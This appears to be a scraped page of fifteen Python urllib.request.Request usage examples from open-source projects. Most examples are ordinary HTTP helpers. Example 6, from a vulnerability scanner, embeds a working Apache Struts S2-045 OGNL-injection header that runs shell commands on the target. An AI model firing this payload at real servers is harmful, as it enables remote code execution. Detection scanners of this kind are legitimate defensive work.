

Python request.Request Method Code Examples

This article collects typical usage examples of the Python urllib.request.Request method. If you have been wondering how request.Request is used in Python, how to call it, or what real-world examples look like, the curated code examples below may help. You can also explore further usage examples from the containing module, urllib.request.


A total of 15 code examples of the request.Request method are shown below, sorted by popularity by default. You can upvote the examples you like or find useful; your feedback helps the system recommend better Python code examples.
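Before the examples, here is a minimal, self-contained sketch of the pattern most of them share: build a Request with a URL and optional headers, open it with urlopen, and read and decode the response. The URL and User-Agent below are placeholders chosen only for illustration.

# Minimal usage sketch of urllib.request.Request (placeholder URL and header values)
from urllib.request import Request, urlopen
from urllib.error import HTTPError, URLError

url = "https://example.com/api/data"  # hypothetical endpoint, for illustration only
req = Request(url, headers={"User-Agent": "Mozilla/5.0"})  # attach a custom request header
try:
    with urlopen(req, timeout=10) as resp:
        body = resp.read().decode("utf-8")
        print(resp.getcode(), len(body))
except (HTTPError, URLError) as err:
    print("Request failed:", err)

Passing a bytes data= argument to Request turns the same pattern into a POST request, as Examples 5, 9 and 12 below show.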

Example 1: get_sdf

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def get_sdf(self):
        """Function to return the SDF (structure-data file) of the PubChem object."""
        from urllib.request import urlopen, Request
        from urllib.parse import quote
        from urllib.error import URLError

        if len(self.dataSDF) == 0:
            url = "https://pubchem.ncbi.nlm.nih.gov/rest/pug/compound/cid/{}/SDF?record_type=3d".format(
                quote(str(self.cid))
            )
            req = Request(url, headers={"Accept": "chemical/x-mdl-sdfile"})
            try:
                self.dataSDF = urlopen(req).read().decode("utf-8")
            except URLError as e:
                msg = "Unable to open\n\n%s\n\ndue to the error\n\n%s\n\n" % (url, e)
                msg += "It is possible that 3D information does not exist for this molecule in the PubChem database\n"
                print(msg)
                raise ValidationError(msg)
        return self.dataSDF 
Developer ID: MolSSI, Project: QCElemental, Lines of code: 21, Source file: pubchem.py

Example 2: hanlp_releases

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def hanlp_releases(cache=True):
    global HANLP_RELEASES
    if cache and HANLP_RELEASES:
        return HANLP_RELEASES
    # print('Request GitHub API')
    # NOTE: "urllib" here is presumably an alias for urllib.request (e.g. "import urllib.request as urllib"),
    # so urllib.Request and urllib.urlopen below refer to urllib.request.Request and urlopen
    req = urllib.Request('http://nlp.hankcs.com/download.php?file=version')
    req.add_header('User-agent', 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.162 Safari/537.36')
    # the original Python 2 and Python 3 branches performed the same call, so a single urlopen suffices
    content = urllib.urlopen(req).read()
    content = json.loads(content.decode())
    jar_version, jar_url, data_version, data_url = content
    meta = [(jar_version, jar_url, data_version, data_url)]
    HANLP_RELEASES = meta
    return meta 
Developer ID: hankcs, Project: pyhanlp, Lines of code: 18, Source file: __init__.py

Example 3: _http_request

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def _http_request(url, headers=None, time_out=10):
    """Perform an HTTP request and return request"""
    log(0, 'Request URL: {url}', url=url)

    try:
        if headers:
            request = Request(url, headers=headers)
        else:
            request = Request(url)
        req = urlopen(request, timeout=time_out)
        log(0, 'Response code: {code}', code=req.getcode())
        if 400 <= req.getcode() < 600:
            raise HTTPError('HTTP %s Error for url: %s' % (req.getcode(), url), response=req)
    except (HTTPError, URLError) as err:
        log(2, 'Download failed with error {}'.format(err))
        if yesno_dialog(localize(30004), '{line1}\n{line2}'.format(line1=localize(30063), line2=localize(30065))):  # Internet down, try again?
            return _http_request(url, headers, time_out)
        return None

    return req 
Developer ID: emilsvennesson, Project: script.module.inputstreamhelper, Lines of code: 22, Source file: utils.py

Example 4: HTML

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def HTML(self, check):
        try:
            if self.UserAgent != None:
                page_html = urlopen(Request(
                        self.target_url,
                        headers={"User-Agent":self.UserAgent}),
                        timeout=self.TimeOut).read().decode("utf-8")

            #If not, the default will be used
            else:
                page_html = urlopen(
                        self.target_url,
                        timeout=self.TimeOut).read().decode("utf-8")

        except HTTPError:
            page_html = "Can't get page source code"

        if self.verbose == True:
            print(" [+] Source code got from %s" % self.target_url)
            print("----START" + "-"*71)
            print(page_html)
            print("----END" + "-"*73)

        return(page_html) 
Developer ID: fnk0c, Project: dot2moon, Lines of code: 26, Source file: connection.py

Example 5: post

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def post(self, payload, request_par):
        data = parse.urlencode(request_par).encode()

        if self.UserAgent != None:
            req = Request(
                    self.target_url,
                    data=data, 
                    headers={"User-Agent":self.UserAgent})
            conn = urlopen(req, timeout=self.TimeOut)
        else:
            conn = urlopen(self.target_url,
                    data=data,
                    timeout=self.TimeOut)

        html = conn.read().decode("utf-8")
        page_size = len(html)

        if self.verbose == True:
            print(" [+] Source code got from %s" % payload)
            print("----START" + "-"*71)
            print(html)
            print("----END" + "-"*73)
        
        return(self.target_url, page_size, html, payload) 
Developer ID: fnk0c, Project: dot2moon, Lines of code: 26, Source file: connection.py

Example 6: st045

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def st045(self):
        try:
            cmd = self.linux
            header = dict()
            header[
                "User-Agent"] = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36"
            header[
                "Content-Type"] = "%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#iswin?(#cmd='" + cmd + "'):(#cmd='" + cmd + "')).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
            r = request.Request(self.url, headers=header)
            text = request.urlopen(r).read()
        except http.client.IncompleteRead as e:
            text = e.partial
        except Exception:
            pass
        if 'text' in locals().keys():
            self.random = str(self.random)
            if self.random.encode('utf-8') in text and len(text) < 15:
                self.result.append('Apache S2-045 Vulnerability: ' + self.url) 
Developer ID: al0ne, Project: Vxscan, Lines of code: 20, Source file: apache_struts_all.py

Example 7: _make_request

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def _make_request(self, opener, request, timeout=None):
        """Make the API call and return the response. This is separated into
           its own function, so we can mock it easily for testing.

        :param opener:
        :type opener:
        :param request: url payload to request
        :type request: urllib.Request object
        :param timeout: timeout value or None
        :type timeout: float
        :return: urllib response
        """
        timeout = timeout or self.timeout
        try:
            return opener.open(request, timeout=timeout)
        except HTTPError as err:
            exc = handle_error(err)
            return exc 
Developer ID: d6t, Project: d6tpipe, Lines of code: 20, Source file: client.py

Example 8: retrieve_url_nodecode

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def retrieve_url_nodecode(url):
    """ Return the content of the url page as a string """
    req = Request(url, headers=headers)
    try:
        response = urlopen(req)
    except URLError as errno:
        print(" ".join(("Connection error:", str(errno.reason))))
        print(" ".join(("URL:", url)))
        return ""
    dat = response.read()
    # Check if it is gzipped (response.read() returns bytes, so compare against the bytes magic number)
    if dat[:2] == b'\x1f\x8b':
        # Data is gzip encoded, decode it (BytesIO rather than StringIO, since dat is bytes;
        # the io and gzip modules are assumed to be imported at module level)
        compressedstream = io.BytesIO(dat)
        gzipper = gzip.GzipFile(fileobj=compressedstream)
        dat = gzipper.read()
        return dat
    return dat 
Developer ID: qbittorrent, Project: search-plugins, Lines of code: 21, Source file: zooqle.py

Example 9: submit

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def submit(self, data):
        from urllib.request import Request, urlopen
        data = json.dumps(data)
        data = data.encode("ASCII")
        req = Request(
            self.url,
            data=data,
            headers={
                "Content-Type": "application/json"
            }
        )
        # ToDo: parse response
        response = urlopen(req)
        # Debug:
        #from pprint import pprint
        #pprint(response) 
Developer ID: DinoTools, Project: dionaea, Lines of code: 18, Source file: log_json.py

Example 10: handle_link

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def handle_link(self, link):
        '''Send a HEAD request to the link, catch any pesky errors'''
        if not bool(urlparse(link).netloc):  # relative link?
            link = urljoin(self.home, link)
        try:
            req = Request(link, headers={'User-Agent': agent}, method='HEAD')
            status = request.urlopen(req).getcode()
        except urllib.error.HTTPError as e:
            print(f'HTTPError: {e.code} - {link}')  # (e.g. 404, 501, etc)
        except urllib.error.URLError as e:
            print(f'URLError: {e.reason} - {link}')  # (e.g. conn. refused)
        except ValueError as e:
            print(f'ValueError {e} - {link}')  # (e.g. missing protocol http)
        else:
            if self.verbose:
                print(f'{status} - {link}')
        if self.home in link:
            self.pages_to_check.appendleft(link)


# check for verbose tag 
Developer ID: healeycodes, Project: Broken-Link-Crawler, Lines of code: 23, Source file: deadseeker.py

Example 11: get_snap

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def get_snap(self, timeout: int = 3) -> Image or None:
        """
        Gets a "snap" of the current camera video data and returns a Pillow Image or None
        :param timeout: Request timeout to camera in seconds
        :return: Image or None
        """
        randomstr = ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
        snap = self.url + "?cmd=Snap&channel=0&rs=" \
               + randomstr \
               + "&user=" + self.username \
               + "&password=" + self.password
        try:
            req = request.Request(snap)
            # "Request.proxies" is assumed to be a proxy mapping configured elsewhere in this project
            req.set_proxy(Request.proxies, 'http')
            # pass the timeout as a keyword argument; the second positional argument of urlopen is "data"
            reader = request.urlopen(req, timeout=timeout)
            if reader.status == 200:
                b = bytearray(reader.read())
                return Image.open(io.BytesIO(b))
            print("Could not retrieve data from camera successfully. Status:", reader.status)
            return None

        except Exception as e:
            print("Could not get Image data\n", e)
            raise 
Developer ID: Benehiko, Project: ReolinkCameraAPI, Lines of code: 26, Source file: recording.py

Example 12: get_access_token

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def get_access_token(self, code, state=None):
        '''
        In callback url: http://host/callback?code=123&state=xyz
        use code and state to get an access token.
        '''
        kw = dict(client_id=self._client_id, client_secret=self._client_secret, code=code)
        if self._redirect_uri:
            kw['redirect_uri'] = self._redirect_uri
        if state:
            kw['state'] = state
        opener = build_opener(HTTPSHandler)
        request = Request('https://github.com/login/oauth/access_token', data=_encode_params(kw))
        request.get_method = _METHOD_MAP['POST']
        request.add_header('Accept', 'application/json')
        try:
            response = opener.open(request, timeout=TIMEOUT)
            r = _parse_json(response.read())
            if 'error' in r:
                raise ApiAuthError(str(r.error))
            return str(r.access_token)
        except HTTPError as e:
            raise ApiAuthError('HTTPError when get access token') 
Developer ID: famavott, Project: osint-scraper, Lines of code: 24, Source file: githubpy.py

Example 13: e_tipo_fii

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def e_tipo_fii(ticker):

    ticker_corrigido = ticker

    if ticker.endswith('12'):
        ticker_corrigido = ticker.replace('12', '11')

    try:
        url = "https://www.fundsexplorer.com.br/funds/%s" % (ticker_corrigido)

        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()

        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')

        titles = soup.findAll('h1', attrs={'class': 'section-title'})
        if len(titles):
            return True
        else:
            return False
    except:
        return False 
Developer ID: guilhermecgs, Project: ir, Lines of code: 26, Source file: crawler_funds_explorer_bs4.py

Example 14: busca_preco_atual

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def busca_preco_atual(ticker):
    if ticker in __cache__:
        return __cache__[ticker]
    try:
        ticker_sa = ticker + '.SA'
        url = "http://finance.yahoo.com/quote/%s?p=%s" % (ticker_sa, ticker_sa)

        # Making the website believe that you are accessing it using a Mozilla browser
        req = Request(url, headers={'User-Agent': 'Mozilla/5.0'})
        webpage = urlopen(req).read()

        time.sleep(1)

        soup = BeautifulSoup(webpage, 'html.parser')
        # html = soup.prettify('utf-8')

        for span in soup.findAll('span', attrs={'class': 'Trsdu(0.3s) Trsdu(0.3s) Fw(b) Fz(36px) Mb(-4px) D(b)'}):
            preco_atual = float(span.text.replace(',', '').strip())
            __cache__[ticker] = preco_atual
            return preco_atual
        raise Exception('Preco ticker nao encontrado ' + ticker)
    except Exception as ex:
        raise Exception('Preco ticker nao encontrado ' + ticker, ex) 
Developer ID: guilhermecgs, Project: ir, Lines of code: 25, Source file: crawler_yahoo_bs4.py

Example 15: get_rdf_from_web

# Required import: from urllib import request [as alias]
# Or: from urllib.request import Request [as alias]
def get_rdf_from_web(url):
    headers = {'Accept':
               'text/turtle, application/rdf+xml, '
               'application/ld+json, application/n-triples,'
               'text/plain'}
    r = request.Request(url, headers=headers)
    resp = request.urlopen(r)
    code = resp.getcode()
    if not (200 <= code <= 210):
        raise RuntimeError("Cannot pull RDF URL from the web: {}, code: {}"
                           .format(url, str(code)))
    known_format = None
    content_type = resp.headers.get('Content-Type', None)
    if content_type:
        if content_type.startswith("text/turtle"):
            known_format = "turtle"
        elif content_type.startswith("application/rdf+xml"):
            known_format = "xml"
        elif content_type.startswith("application/xml"):
            known_format = "xml"
        elif content_type.startswith("application/ld+json"):
            known_format = "json-ld"
        elif content_type.startswith("application/n-triples"):
            known_format = "nt"
    return resp, known_format 
Developer ID: RDFLib, Project: pySHACL, Lines of code: 27, Source file: load.py


Note: The urllib.request.Request method examples in this article were compiled by 纯净天空 from open-source code and documentation platforms such as GitHub and MSDocs. The code snippets were selected from open-source projects contributed by many developers; copyright of the source code remains with the original authors. For distribution and use, please refer to the corresponding project's License; do not reproduce without permission.